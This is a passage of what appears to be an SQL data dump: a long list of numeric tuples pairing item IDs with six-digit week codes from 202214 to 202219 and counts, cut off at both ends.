202214',8),(3278,1,'202214',8),(3297,1,'202214',8),(3313,1,'202214',8),(3482,1,'202214',8),(3724,1,'202214',8),(3777,1,'202214',8),(4341,1,'202214',8),(4357,1,'202214',8),(4454,1,'202214',8),(4524,1,'202214',8),(74,1,'202214',9),(84,1,'202214',9),(479,1,'202214',9),(483,1,'202214',9),(1584,1,'202214',9),(1722,1,'202214',9),(1728,1,'202214',9),(2296,1,'202214',9),(2558,1,'202214',9),(2804,1,'202214',9),(2989,1,'202214',9),(3063,1,'202214',9),(3316,1,'202214',9),(3430,1,'202214',9),(3534,1,'202214',9),(3710,1,'202214',9),(4301,1,'202214',9),(4335,1,'202214',9),(4338,1,'202214',9),(4396,1,'202214',9),(4542,1,'202214',9),(4556,1,'202214',9),(335,1,'202214',10),(480,1,'202214',10),(487,1,'202214',10),(1770,1,'202214',10),(2165,1,'202214',10),(3290,1,'202214',10),(3438,1,'202214',10),(3531,1,'202214',10),(4587,1,'202214',10),(4591,1,'202214',10),(108,1,'202214',11),(482,1,'202214',11),(1778,1,'202214',11),(3038,1,'202214',11),(3045,1,'202214',11),(3498,1,'202214',11),(4275,1,'202214',11),(467,1,'202214',12),(472,1,'202214',12),(1598,1,'202214',12),(1604,1,'202214',12),(2457,1,'202214',12),(3069,1,'202214',12),(3104,1,'202214',12),(3752,1,'202214',12),(4412,1,'202214',12),(4566,1,'202214',12),(470,1,'202214',13),(2309,1,'202214',13),(2609,1,'202214',13),(3004,1,'202214',13),(3479,1,'202214',13),(4323,1,'202214',13),(4457,1,'202214',13),(4520,1,'202214',13),(570,1,'202214',14),(1596,1,'202214',14),(2503,1,'202214',14),(2769,1,'202214',14),(469,1,'202214',15),(3127,1,'202214',15),(3746,1,'202214',15),(87,1,'202214',16),(1582,1,'202214',16),(1594,1,'202214',16),(1606,1,'202214',16),(1612,1,'202214',16),(3060,1,'202214',17),(3764,1,'202214',17),(4582,1,'202214',18),(2904,1,'202214',19),(91,1,'202214',20),(1588,1,'202214',20),(72,1,'202214',22),(76,1,'202214',22),(89,1,'202214',22),(1600,1,'202214',24),(1544,1,'202214',25),(68,1,'202214',26),(1586,1,'202214',26),(3781,1,'202214',27),(3030,1,'202214',29),(1602,1,'202214',35),(80,1,'202214',58),(9,1,'202214',607),(110,1,'202215',1),(106,1,'202215',2),(1715,1,'202215',2),(1730,1,'202215',2),(1732,1,'202215',2),(1749,1,'202215',2),(1772,1,'202215',2),(2248,1,'202215',2),(2252,1,'202215',2),(3006,1,'202215',2),(3079,1,'202215',2),(3096,1,'202215',2),(3097,1,'202215',2),(3229,1,'202215',2),(3265,1,'202215',2),(1699,1,'202215',3),(1705,1,'202215',3),(1726,1,'202215',3),(1739,1,'202215',3),(1743,1,'202215',3),(1747,1,'202215',3),(1751,1,'202215',3),(1776,1,'202215',3),(2156,1,'202215',3),(2161,1,'202215',3),(2991,1,'202215',3),(2993,1,'202215',3),(3005,1,'202215',3),(3102,1,'202215',3),(3109,1,'202215',3),(3247,1,'202215',3),(3251,1,'202215',3),(3257,1,'202215',3),(3263,1,'202215',3),(3269,1,'202215',3),(3275,1,'202215',3),(3280,1,'202215',3),(3486,1,'202215',3),(3541,1,'202215',3),(4357,1,'202215',3),(4368,1,'202215',3),(1695,1,'202215',4),(1709,1,'202215',4),(1711,1,'202215',4),(1718,1,'202215',4),(1720,1,'202215',4),(1734,1,'202215',4),(1780,1,'202215',4),(2063,1,'202215',4),(2165,1,'202215',4),(2178,1,'202215',4),(2293,1,'202215',4),(2558,1,'202215',4),(2658,1,'202215',4),(2965,1,'202215',4),(3023,1,'202215',4),(3034,1,'202215',4),(3104,1,'202215',4),(3243,1,'202215',4),(3249,1,'202215',4),(3273,1,'202215',4),(3278,1,'202215',4),(3285,1,'202215',4),(3297,1,'202215',4),(3316,1,'202215',4),(3727,1,'202215',4),(3735,1,'202215',4),(4363,1,'202215',4),(4373,1,'202215',4),(4377,1,'202215',4),(467,1,'202215',5),(472,1,'202215',5),(477,1,'202215',5),(478,1,'202215',5),(483,1,'202215',5),(485,1,'202215',5),(1703,1,'202215',5),(1713,1,'202215',5),(1724,1,'202215',5),(1766,1,'202215',5),(1770,1,'202215',5),(1782,1,'202215',5),(2148,1,'202215',5),(2617,1,'202215',5),(2748,1,'202215',5),(2751,1,'202215',5),(2804,1,'202215',5),(2989,1,'202215',5),(3083,1,'202215',5),(3087,1,'202215',5),(3092,1,'202215',5),(3240,1,'202215',5),(3259,1,'202215',5),(3282,1,'202215',5),(3287,1,'202215',5),(3721,1,'202215',5),(3724,1,'202215',5),(3774,1,'202215',5),(4301,1,'202215',5),(4323,1,'202215',5),(4408,1,'202215',5),(102,1,'202215',6),(480,1,'202215',6),(482,1,'202215',6),(484,1,'202215',6),(1697,1,'202215',6),(1701,1,'202215',6),(1707,1,'202215',6),(1737,1,'202215',6),(1745,1,'202215',6),(1768,1,'202215',6),(1778,1,'202215',6),(2150,1,'202215',6),(2152,1,'202215',6),(2704,1,'202215',6),(2911,1,'202215',6),(3027,1,'202215',6),(3038,1,'202215',6),(3045,1,'202215',6),(3226,1,'202215',6),(3245,1,'202215',6),(3253,1,'202215',6),(3261,1,'202215',6),(3267,1,'202215',6),(3430,1,'202215',6),(3479,1,'202215',6),(3498,1,'202215',6),(3534,1,'202215',6),(3714,1,'202215',6),(3731,1,'202215',6),(3742,1,'202215',6),(3749,1,'202215',6),(3777,1,'202215',6),(4238,1,'202215',6),(4329,1,'202215',6),(4338,1,'202215',6),(4382,1,'202215',6),(471,1,'202215',7),(476,1,'202215',7),(1604,1,'202215',7),(2159,1,'202215',7),(2297,1,'202215',7),(2769,1,'202215',7),(2775,1,'202215',7),(2801,1,'202215',7),(2964,1,'202215',7),(3063,1,'202215',7),(3069,1,'202215',7),(3107,1,'202215',7),(3117,1,'202215',7),(3124,1,'202215',7),(3290,1,'202215',7),(3307,1,'202215',7),(3531,1,'202215',7),(3738,1,'202215',7),(3771,1,'202215',7),(4332,1,'202215',7),(4335,1,'202215',7),(4341,1,'202215',7),(4387,1,'202215',7),(4391,1,'202215',7),(4404,1,'202215',7),(4412,1,'202215',7),(4428,1,'202215',7),(4432,1,'202215',7),(4444,1,'202215',7),(479,1,'202215',8),(481,1,'202215',8),(486,1,'202215',8),(570,1,'202215',8),(1590,1,'202215',8),(1592,1,'202215',8),(1722,1,'202215',8),(2154,1,'202215',8),(2457,1,'202215',8),(2813,1,'202215',8),(2956,1,'202215',8),(3066,1,'202215',8),(3090,1,'202215',8),(3271,1,'202215',8),(3438,1,'202215',8),(3482,1,'202215',8),(3710,1,'202215',8),(4275,1,'202215',8),(4396,1,'202215',8),(4436,1,'202215',8),(4440,1,'202215',8),(4556,1,'202215',8),(335,1,'202215',9),(468,1,'202215',9),(488,1,'202215',9),(1612,1,'202215',9),(1614,1,'202215',9),(3004,1,'202215',9),(3041,1,'202215',9),(3127,1,'202215',9),(3489,1,'202215',9),(3746,1,'202215',9),(3752,1,'202215',9),(4326,1,'202215',9),(4420,1,'202215',9),(4424,1,'202215',9),(4546,1,'202215',9),(469,1,'202215',10),(474,1,'202215',10),(1610,1,'202215',10),(1774,1,'202215',10),(2296,1,'202215',10),(3313,1,'202215',10),(4454,1,'202215',10),(4514,1,'202215',10),(4542,1,'202215',10),(1741,1,'202215',11),(2609,1,'202215',11),(2809,1,'202215',11),(3060,1,'202215',11),(4416,1,'202215',11),(4517,1,'202215',11),(4551,1,'202215',11),(470,1,'202215',12),(487,1,'202215',12),(1728,1,'202215',12),(3072,1,'202215',12),(74,1,'202215',13),(473,1,'202215',13),(1606,1,'202215',13),(2309,1,'202215',13),(2503,1,'202215',13),(3030,1,'202215',13),(4400,1,'202215',13),(4587,1,'202215',13),(4591,1,'202215',13),(84,1,'202215',14),(4448,1,'202215',14),(108,1,'202215',15),(1582,1,'202215',15),(1584,1,'202215',15),(1598,1,'202215',15),(4524,1,'202215',15),(4566,1,'202215',15),(1544,1,'202215',16),(3781,1,'202215',16),(4529,1,'202215',16),(3764,1,'202215',17),(76,1,'202215',18),(87,1,'202215',18),(4457,1,'202215',18),(1596,1,'202215',19),(4520,1,'202215',19),(4582,1,'202215',19),(1588,1,'202215',20),(1594,1,'202215',22),(1608,1,'202215',23),(89,1,'202215',25),(72,1,'202215',26),(68,1,'202215',27),(91,1,'202215',27),(1600,1,'202215',31),(2904,1,'202215',39),(1602,1,'202215',40),(1586,1,'202215',47),(80,1,'202215',56),(9,1,'202215',564),(3269,1,'202216',2),(1709,1,'202216',3),(1713,1,'202216',3),(1715,1,'202216',3),(1718,1,'202216',3),(1730,1,'202216',3),(1732,1,'202216',3),(1734,1,'202216',3),(1747,1,'202216',3),(1780,1,'202216',3),(2178,1,'202216',3),(2248,1,'202216',3),(2293,1,'202216',3),(3045,1,'202216',3),(3240,1,'202216',3),(3245,1,'202216',3),(3249,1,'202216',3),(3259,1,'202216',3),(3261,1,'202216',3),(3265,1,'202216',3),(3531,1,'202216',3),(3534,1,'202216',3),(3710,1,'202216',3),(3727,1,'202216',3),(3735,1,'202216',3),(3738,1,'202216',3),(4275,1,'202216',3),(4323,1,'202216',3),(4332,1,'202216',3),(4357,1,'202216',3),(4363,1,'202216',3),(483,1,'202216',4),(484,1,'202216',4),(1703,1,'202216',4),(1705,1,'202216',4),(1711,1,'202216',4),(1722,1,'202216',4),(1770,1,'202216',4),(1778,1,'202216',4),(2063,1,'202216',4),(2148,1,'202216',4),(2152,1,'202216',4),(2161,1,'202216',4),(2165,1,'202216',4),(2704,1,'202216',4),(2956,1,'202216',4),(2964,1,'202216',4),(2989,1,'202216',4),(3027,1,'202216',4),(3034,1,'202216',4),(3038,1,'202216',4),(3087,1,'202216',4),(3092,1,'202216',4),(3096,1,'202216',4),(3226,1,'202216',4),(3247,1,'202216',4),(3253,1,'202216',4),(3257,1,'202216',4),(3263,1,'202216',4),(3267,1,'202216',4),(3271,1,'202216',4),(3297,1,'202216',4),(3307,1,'202216',4),(3313,1,'202216',4),(3438,1,'202216',4),(3498,1,'202216',4),(3541,1,'202216',4),(4238,1,'202216',4),(4301,1,'202216',4),(4326,1,'202216',4),(4329,1,'202216',4),(4335,1,'202216',4),(4338,1,'202216',4),(4377,1,'202216',4),(4382,1,'202216',4),(4387,1,'202216',4),(4428,1,'202216',4),(4444,1,'202216',4),(4546,1,'202216',4),(4556,1,'202216',4),(74,1,'202216',5),(476,1,'202216',5),(1697,1,'202216',5),(1699,1,'202216',5),(1701,1,'202216',5),(1737,1,'202216',5),(1745,1,'202216',5),(1768,1,'202216',5),(1772,1,'202216',5),(1774,1,'202216',5),(2156,1,'202216',5),(2252,1,'202216',5),(2457,1,'202216',5),(2617,1,'202216',5),(2658,1,'202216',5),(2751,1,'202216',5),(2965,1,'202216',5),(3066,1,'202216',5),(3072,1,'202216',5),(3079,1,'202216',5),(3083,1,'202216',5),(3229,1,'202216',5),(3251,1,'202216',5),(3273,1,'202216',5),(3275,1,'202216',5),(3278,1,'202216',5),(3280,1,'202216',5),(3287,1,'202216',5),(3316,1,'202216',5),(3486,1,'202216',5),(3489,1,'202216',5),(3724,1,'202216',5),(3731,1,'202216',5),(3749,1,'202216',5),(3771,1,'202216',5),(3777,1,'202216',5),(4341,1,'202216',5),(4373,1,'202216',5),(4420,1,'202216',5),(4424,1,'202216',5),(4436,1,'202216',5),(474,1,'202216',6),(477,1,'202216',6),(478,1,'202216',6),(1584,1,'202216',6),(1590,1,'202216',6),(1695,1,'202216',6),(1741,1,'202216',6),(1743,1,'202216',6),(1749,1,'202216',6),(1766,1,'202216',6),(1776,1,'202216',6),(2154,1,'202216',6),(2748,1,'202216',6),(2801,1,'202216',6),(2804,1,'202216',6),(2809,1,'202216',6),(2911,1,'202216',6),(2991,1,'202216',6),(3006,1,'202216',6),(3023,1,'202216',6),(3041,1,'202216',6),(3060,1,'202216',6),(3063,1,'202216',6),(3090,1,'202216',6),(3124,1,'202216',6),(3243,1,'202216',6),(3282,1,'202216',6),(3290,1,'202216',6),(3479,1,'202216',6),(3714,1,'202216',6),(3721,1,'202216',6),(4368,1,'202216',6),(4391,1,'202216',6),(4396,1,'202216',6),(4408,1,'202216',6),(4454,1,'202216',6),(102,1,'202216',7),(471,1,'202216',7),(472,1,'202216',7),(473,1,'202216',7),(482,1,'202216',7),(485,1,'202216',7),(486,1,'202216',7),(488,1,'202216',7),(1726,1,'202216',7),(1739,1,'202216',7),(1751,1,'202216',7),(2296,1,'202216',7),(2609,1,'202216',7),(2813,1,'202216',7),(3097,1,'202216',7),(3102,1,'202216',7),(3107,1,'202216',7),(3109,1,'202216',7),(3285,1,'202216',7),(3430,1,'202216',7),(3742,1,'202216',7),(3746,1,'202216',7),(4514,1,'202216',7),(4591,1,'202216',7),(467,1,'202216',8),(468,1,'202216',8),(480,1,'202216',8),(481,1,'202216',8),(1610,1,'202216',8),(1614,1,'202216',8),(1720,1,'202216',8),(1724,1,'202216',8),(2297,1,'202216',8),(2558,1,'202216',8),(3030,1,'202216',8),(3104,1,'202216',8),(3117,1,'202216',8),(4404,1,'202216',8),(4432,1,'202216',8),(4448,1,'202216',8),(470,1,'202216',9),(479,1,'202216',9),(487,1,'202216',9),(570,1,'202216',9),(1592,1,'202216',9),(1604,1,'202216',9),(1782,1,'202216',9),(2150,1,'202216',9),(2775,1,'202216',9),(2993,1,'202216',9),(3774,1,'202216',9),(4440,1,'202216',9),(4542,1,'202216',9),(4608,1,'202216',9),(4612,1,'202216',9),(84,1,'202216',10),(335,1,'202216',10),(1707,1,'202216',10),(2159,1,'202216',10),(2503,1,'202216',10),(3069,1,'202216',10),(3127,1,'202216',10),(4412,1,'202216',10),(108,1,'202216',11),(1608,1,'202216',11),(1728,1,'202216',11),(2769,1,'202216',11),(3005,1,'202216',11),(3482,1,'202216',11),(3752,1,'202216',11),(4416,1,'202216',11),(4517,1,'202216',11),(4566,1,'202216',11),(1582,1,'202216',12),(1596,1,'202216',12),(2309,1,'202216',12),(3004,1,'202216',12),(3781,1,'202216',12),(4529,1,'202216',12),(4551,1,'202216',12),(76,1,'202216',13),(87,1,'202216',13),(1612,1,'202216',13),(3764,1,'202216',13),(4400,1,'202216',13),(4587,1,'202216',13),(469,1,'202216',14),(1598,1,'202216',14),(4524,1,'202216',14),(1588,1,'202216',15),(1606,1,'202216',15),(4520,1,'202216',16),(1544,1,'202216',17),(72,1,'202216',19),(1594,1,'202216',19),(89,1,'202216',20),(68,1,'202216',22),(1600,1,'202216',24),(4582,1,'202216',24),(4457,1,'202216',25),(91,1,'202216',30),(2904,1,'202216',31),(1586,1,'202216',34),(1602,1,'202216',36),(80,1,'202216',67),(9,1,'202216',626),(106,1,'202217',1),(110,1,'202217',3),(1751,1,'202217',3),(2152,1,'202217',3),(2293,1,'202217',3),(2296,1,'202217',3),(3724,1,'202217',3),(3727,1,'202217',3),(3749,1,'202217',3),(4363,1,'202217',3),(1720,1,'202217',4),(1739,1,'202217',4),(1743,1,'202217',4),(2063,1,'202217',4),(2161,1,'202217',4),(3072,1,'202217',4),(3107,1,'202217',4),(3124,1,'202217',4),(3247,1,'202217',4),(3280,1,'202217',4),(3287,1,'202217',4),(3486,1,'202217',4),(3721,1,'202217',4),(3738,1,'202217',4),(4329,1,'202217',4),(4357,1,'202217',4),(4368,1,'202217',4),(4377,1,'202217',4),(102,1,'202217',5),(484,1,'202217',5),(488,1,'202217',5),(1697,1,'202217',5),(1699,1,'202217',5),(1703,1,'202217',5),(1734,1,'202217',5),(1768,1,'202217',5),(1770,1,'202217',5),(1774,1,'202217',5),(1776,1,'202217',5),(1782,1,'202217',5),(2150,1,'202217',5),(2156,1,'202217',5),(2165,1,'202217',5),(2751,1,'202217',5),(2801,1,'202217',5),(2965,1,'202217',5),(2989,1,'202217',5),(2991,1,'202217',5),(3226,1,'202217',5),(3229,1,'202217',5),(3240,1,'202217',5),(3269,1,'202217',5),(3282,1,'202217',5),(3430,1,'202217',5),(3531,1,'202217',5),(3534,1,'202217',5),(3731,1,'202217',5),(3735,1,'202217',5),(3774,1,'202217',5),(3777,1,'202217',5),(4238,1,'202217',5),(4301,1,'202217',5),(4332,1,'202217',5),(4341,1,'202217',5),(4382,1,'202217',5),(4396,1,'202217',5),(4454,1,'202217',5),(467,1,'202217',6),(472,1,'202217',6),(476,1,'202217',6),(478,1,'202217',6),(480,1,'202217',6),(481,1,'202217',6),(483,1,'202217',6),(570,1,'202217',6),(1705,1,'202217',6),(1713,1,'202217',6),(1726,1,'202217',6),(1730,1,'202217',6),(1745,1,'202217',6),(1747,1,'202217',6),(1749,1,'202217',6),(1772,1,'202217',6),(1780,1,'202217',6),(2178,1,'202217',6),(2252,1,'202217',6),(2658,1,'202217',6),(2748,1,'202217',6),(2775,1,'202217',6),(2911,1,'202217',6),(2964,1,'202217',6),(3023,1,'202217',6),(3034,1,'202217',6),(3038,1,'202217',6),(3041,1,'202217',6),(3045,1,'202217',6),(3083,1,'202217',6),(3090,1,'202217',6),(3109,1,'202217',6),(3243,1,'202217',6),(3249,1,'202217',6),(3257,1,'202217',6),(3259,1,'202217',6),(3263,1,'202217',6),(3275,1,'202217',6),(3278,1,'202217',6),(3290,1,'202217',6),(3489,1,'202217',6),(3498,1,'202217',6),(3714,1,'202217',6),(4335,1,'202217',6),(4373,1,'202217',6),(4436,1,'202217',6),(4448,1,'202217',6),(4517,1,'202217',6),(4556,1,'202217',6),(4587,1,'202217',6),(4591,1,'202217',6),(479,1,'202217',7),(485,1,'202217',7),(1584,1,'202217',7),(1610,1,'202217',7),(1709,1,'202217',7),(1718,1,'202217',7),(1732,1,'202217',7),(1737,1,'202217',7),(1766,1,'202217',7),(1778,1,'202217',7),(2154,1,'202217',7),(2558,1,'202217',7),(3060,1,'202217',7),(3066,1,'202217',7),(3079,1,'202217',7),(3092,1,'202217',7),(3096,1,'202217',7),(3097,1,'202217',7),(3102,1,'202217',7),(3251,1,'202217',7),(3253,1,'202217',7),(3265,1,'202217',7),(3271,1,'202217',7),(3273,1,'202217',7),(3285,1,'202217',7),(3307,1,'202217',7),(3438,1,'202217',7),(3482,1,'202217',7),(3541,1,'202217',7),(3710,1,'202217',7),(3764,1,'202217',7),(3771,1,'202217',7),(4391,1,'202217',7),(4404,1,'202217',7),(4424,1,'202217',7),(4432,1,'202217',7),(4444,1,'202217',7),(4514,1,'202217',7),(4546,1,'202217',7),(1590,1,'202217',8),(1604,1,'202217',8),(1695,1,'202217',8),(1715,1,'202217',8),(1724,1,'202217',8),(2297,1,'202217',8),(2813,1,'202217',8),(2993,1,'202217',8),(3006,1,'202217',8),(3087,1,'202217',8),(3267,1,'202217',8),(3297,1,'202217',8),(3316,1,'202217',8),(4275,1,'202217',8),(4323,1,'202217',8),(4326,1,'202217',8),(4338,1,'202217',8),(4387,1,'202217',8),(4416,1,'202217',8),(4428,1,'202217',8),(4440,1,'202217',8),(4566,1,'202217',8),(486,1,'202217',9),(1722,1,'202217',9),(2148,1,'202217',9),(2248,1,'202217',9),(2704,1,'202217',9),(2809,1,'202217',9),(2956,1,'202217',9),(3063,1,'202217',9),(3245,1,'202217',9),(3261,1,'202217',9),(4542,1,'202217',9),(4648,1,'202217',9),(469,1,'202217',10),(477,1,'202217',10),(487,1,'202217',10),(1592,1,'202217',10),(1707,1,'202217',10),(1711,1,'202217',10),(2804,1,'202217',10),(3004,1,'202217',10),(3027,1,'202217',10),(3117,1,'202217',10),(3742,1,'202217',10),(4408,1,'202217',10),(4412,1,'202217',10),(471,1,'202217',11),(1596,1,'202217',11),(1701,1,'202217',11),(1741,1,'202217',11),(3005,1,'202217',11),(3104,1,'202217',11),(3479,1,'202217',11),(4420,1,'202217',11),(4551,1,'202217',11),(474,1,'202217',12),(1614,1,'202217',12),(3127,1,'202217',12),(4608,1,'202217',12),(4612,1,'202217',12),(4645,1,'202217',12),(74,1,'202217',13),(470,1,'202217',13),(473,1,'202217',13),(482,1,'202217',13),(1608,1,'202217',13),(1728,1,'202217',13),(2457,1,'202217',13),(2503,1,'202217',13),(2609,1,'202217',13),(2617,1,'202217',13),(2769,1,'202217',13),(3069,1,'202217',13),(84,1,'202217',14),(108,1,'202217',14),(335,1,'202217',14),(4651,1,'202217',14),(1544,1,'202217',15),(1612,1,'202217',15),(2159,1,'202217',15),(4529,1,'202217',15),(1582,1,'202217',16),(3313,1,'202217',16),(3746,1,'202217',16),(4400,1,'202217',16),(3752,1,'202217',17),(3781,1,'202217',17),(4524,1,'202217',17),(4660,1,'202217',17),(4582,1,'202217',18),(4654,1,'202217',18),(87,1,'202217',19),(468,1,'202217',19),(1588,1,'202217',19),(1606,1,'202217',19),(4520,1,'202217',19),(4657,1,'202217',19),(3030,1,'202217',20),(4457,1,'202217',20),(4663,1,'202217',20),(76,1,'202217',21),(1594,1,'202217',21),(2309,1,'202217',21),(1598,1,'202217',22),(68,1,'202217',23),(89,1,'202217',24),(1602,1,'202217',25),(1600,1,'202217',27),(72,1,'202217',28),(91,1,'202217',28),(2904,1,'202217',28),(1586,1,'202217',36),(80,1,'202217',67),(9,1,'202217',586),(479,1,'202218',1),(1584,1,'202218',1),(1705,1,'202218',1),(1768,1,'202218',1),(2252,1,'202218',1),(2293,1,'202218',1),(2558,1,'202218',1),(2775,1,'202218',1),(2991,1,'202218',1),(3087,1,'202218',1),(3097,1,'202218',1),(3261,1,'202218',1),(3275,1,'202218',1),(3278,1,'202218',1),(3297,1,'202218',1),(4301,1,'202218',1),(4373,1,'202218',1),(4591,1,'202218',1),(110,1,'202218',2),(472,1,'202218',2),(473,1,'202218',2),(480,1,'202218',2),(1590,1,'202218',2),(1695,1,'202218',2),(1701,1,'202218',2),(1713,1,'202218',2),(1718,1,'202218',2),(1720,1,'202218',2),(1724,1,'202218',2),(1732,1,'202218',2),(1776,1,'202218',2),(2150,1,'202218',2),(2617,1,'202218',2),(2964,1,'202218',2),(2965,1,'202218',2),(2989,1,'202218',2),(2993,1,'202218',2),(3041,1,'202218',2),(3066,1,'202218',2),(3079,1,'202218',2),(3109,1,'202218',2),(3245,1,'202218',2),(3257,1,'202218',2),(3263,1,'202218',2),(3267,1,'202218',2),(3273,1,'202218',2),(3541,1,'202218',2),(3714,1,'202218',2),(4275,1,'202218',2),(4338,1,'202218',2),(4382,1,'202218',2),(4440,1,'202218',2),(4542,1,'202218',2),(4546,1,'202218',2),(102,1,'202218',3),(474,1,'202218',3),(477,1,'202218',3),(481,1,'202218',3),(485,1,'202218',3),(488,1,'202218',3),(1707,1,'202218',3),(1728,1,'202218',3),(1739,1,'202218',3),(1747,1,'202218',3),(1749,1,'202218',3),(1751,1,'202218',3),(2148,1,'202218',3),(2154,1,'202218',3),(2156,1,'202218',3),(2248,1,'202218',3),(2748,1,'202218',3),(3005,1,'202218',3),(3006,1,'202218',3),(3092,1,'202218',3),(3102,1,'202218',3),(3229,1,'202218',3),(3247,1,'202218',3),(3259,1,'202218',3),(3269,1,'202218',3),(3271,1,'202218',3),(3280,1,'202218',3),(3287,1,'202218',3),(3290,1,'202218',3),(3316,1,'202218',3),(3482,1,'202218',3),(3731,1,'202218',3),(3746,1,'202218',3),(3771,1,'202218',3),(3774,1,'202218',3),(3777,1,'202218',3),(4357,1,'202218',3),(4368,1,'202218',3),(4396,1,'202218',3),(4408,1,'202218',3),(4444,1,'202218',3),(4556,1,'202218',3),(478,1,'202218',4),(483,1,'202218',4),(486,1,'202218',4),(570,1,'202218',4),(1726,1,'202218',4),(1734,1,'202218',4),(1737,1,'202218',4),(1741,1,'202218',4),(1743,1,'202218',4),(1772,1,'202218',4),(1774,1,'202218',4),(1778,1,'202218',4),(2152,1,'202218',4),(2159,1,'202218',4),(2161,1,'202218',4),(2178,1,'202218',4),(2658,1,'202218',4),(2704,1,'202218',4),(2751,1,'202218',4),(2769,1,'202218',4),(2813,1,'202218',4),(3090,1,'202218',4),(3243,1,'202218',4),(3249,1,'202218',4),(3265,1,'202218',4),(3285,1,'202218',4),(3479,1,'202218',4),(3531,1,'202218',4),(3727,1,'202218',4),(3738,1,'202218',4),(4341,1,'202218',4),(4363,1,'202218',4),(4377,1,'202218',4),(4448,1,'202218',4),(4454,1,'202218',4),(4514,1,'202218',4),(4517,1,'202218',4),(4587,1,'202218',4),(4608,1,'202218',4),(4612,1,'202218',4),(467,1,'202218',5),(1614,1,'202218',5),(1697,1,'202218',5),(1703,1,'202218',5),(1715,1,'202218',5),(1730,1,'202218',5),(2063,1,'202218',5),(2804,1,'202218',5),(2956,1,'202218',5),(3072,1,'202218',5),(3107,1,'202218',5),(3253,1,'202218',5),(3282,1,'202218',5),(3430,1,'202218',5),(3498,1,'202218',5),(3710,1,'202218',5),(3735,1,'202218',5),(4323,1,'202218',5),(4329,1,'202218',5),(4332,1,'202218',5),(4387,1,'202218',5),(4391,1,'202218',5),(4420,1,'202218',5),(4428,1,'202218',5),(4529,1,'202218',5),(470,1,'202218',6),(476,1,'202218',6),(482,1,'202218',6),(484,1,'202218',6),(1711,1,'202218',6),(3034,1,'202218',6),(3104,1,'202218',6),(3124,1,'202218',6),(3226,1,'202218',6),(3313,1,'202218',6),(3438,1,'202218',6),(3721,1,'202218',6),(4238,1,'202218',6),(4424,1,'202218',6),(4432,1,'202218',6),(4436,1,'202218',6),(4524,1,'202218',6),(1604,1,'202218',7),(2165,1,'202218',7),(2296,1,'202218',7),(3027,1,'202218',7),(3030,1,'202218',7),(3251,1,'202218',7),(3489,1,'202218',7),(3534,1,'202218',7),(3749,1,'202218',7),(4335,1,'202218',7),(4404,1,'202218',7),(74,1,'202218',8),(487,1,'202218',8),(1594,1,'202218',8),(1610,1,'202218',8),(1770,1,'202218',8),(2609,1,'202218',8),(2911,1,'202218',8),(3038,1,'202218',8),(3083,1,'202218',8),(3307,1,'202218',8),(3486,1,'202218',8),(3724,1,'202218',8),(4326,1,'202218',8),(4412,1,'202218',8),(4651,1,'202218',8),(469,1,'202218',9),(1592,1,'202218',9),(1606,1,'202218',9),(1722,1,'202218',9),(2801,1,'202218',9),(2809,1,'202218',9),(3004,1,'202218',9),(3045,1,'202218',9),(3069,1,'202218',9),(3117,1,'202218',9),(3240,1,'202218',9),(4400,1,'202218',9),(4551,1,'202218',9),(87,1,'202218',10),(468,1,'202218',10),(2297,1,'202218',10),(2457,1,'202218',10),(3023,1,'202218',10),(3127,1,'202218',10),(2309,1,'202218',11),(3063,1,'202218',11),(3742,1,'202218',11),(4416,1,'202218',11),(4520,1,'202218',11),(4645,1,'202218',11),(84,1,'202218',12),(108,1,'202218',12),(471,1,'202218',12),(1608,1,'202218',12),(1766,1,'202218',12),(3060,1,'202218',12),(4566,1,'202218',12),(4657,1,'202218',12),(76,1,'202218',13),(1582,1,'202218',13),(1588,1,'202218',13),(3764,1,'202218',13),(4648,1,'202218',13),(3752,1,'202218',14),(89,1,'202218',15),(1612,1,'202218',15),(3781,1,'202218',15),(4660,1,'202218',15),(4663,1,'202218',15),(72,1,'202218',16),(91,1,'202218',16),(2503,1,'202218',16),(1544,1,'202218',17),(4457,1,'202218',18),(4582,1,'202218',18),(4654,1,'202218',18),(335,1,'202218',19),(1598,1,'202218',19),(1600,1,'202218',22),(1596,1,'202218',25),(68,1,'202218',26),(1602,1,'202218',28),(2904,1,'202218',36),(1586,1,'202218',47),(80,1,'202218',66),(9,1,'202218',579),(3247,1,'202219',1),(110,1,'202219',2),(2161,1,'202219',2),(3249,1,'202219',2),(3265,1,'202219',2),(3486,1,'202219',2),(3534,1,'202219',2),(3721,1,'202219',2),(106,1,'202219',3),(1701,1,'202219',3),(1739,1,'202219',3),(1743,1,'202219',3),(1745,1,'202219',3),(1751,1,'202219',3),(2063,1,'202219',3),(2154,1,'202219',3),(2617,1,'202219',3),(2658,1,'202219',3),(2748,1,'202219',3),(2989,1,'202219',3),(3005,1,'202219',3),(3092,1,'202219',3),(3097,1,'202219',3),(3124,1,'202219',3),(3240,1,'202219',3),(3251,1,'202219',3),(3257,1,'202219',3),(3263,1,'202219',3),(3275,1,'202219',3),(3278,1,'202219',3),(3287,1,'202219',3),(3738,1,'202219',3),(4275,1,'202219',3),(4368,1,'202219',3),(4387,1,'202219',3),(1705,1,'202219',4),(1720,1,'202219',4),(1722,1,'202219',4),(1730,1,'202219',4),(1732,1,'202219',4),(1737,1,'202219',4),(1747,1,'202219',4),(1749,1,'202219',4),(1770,1,'202219',4),(1774,1,'202219',4),(1776,1,'202219',4),(1778,1,'202219',4),(1780,1,'202219',4),(2148,1,'202219',4),(2152,1,'202219',4),(2159,1,'202219',4),(2178,1,'202219',4),(2248,1,'202219',4),(2293,1,'202219',4),(2956,1,'202219',4),(2991,1,'202219',4),(3023,1,'202219',4),(3034,1,'202219',4),(3229,1,'202219',4),(3245,1,'202219',4),(3259,1,'202219',4),(3261,1,'202219',4),(3269,1,'202219',4),(3271,1,'202219',4),(3280,1,'202219',4),(3285,1,'202219',4),(3290,1,'202219',4),(3297,1,'202219',4),(3307,1,'202219',4),(3714,1,'202219',4),(3735,1,'202219',4),(3777,1,'202219',4),(4329,1,'202219',4),(4338,1,'202219',4),(4382,1,'202219',4),(4391,1,'202219',4),(4517,1,'202219',4),(4608,1,'202219',4),(4648,1,'202219',4),(102,1,'202219',5),(468,1,'202219',5),(474,1,'202219',5),(478,1,'202219',5),(487,1,'202219',5),(1695,1,'202219',5),(1697,1,'202219',5),(1699,1,'202219',5),(1703,1,'202219',5),(1713,1,'202219',5),(1715,1,'202219',5),(1718,1,'202219',5),(2150,1,'202219',5),(2156,1,'202219',5),(2165,1,'202219',5),(2704,1,'202219',5),(2965,1,'202219',5),(3083,1,'202219',5),(3090,1,'202219',5),(3096,1,'202219',5),(3243,1,'202219',5),(3273,1,'202219',5),(3282,1,'202219',5),(3438,1,'202219',5),(3498,1,'202219',5),(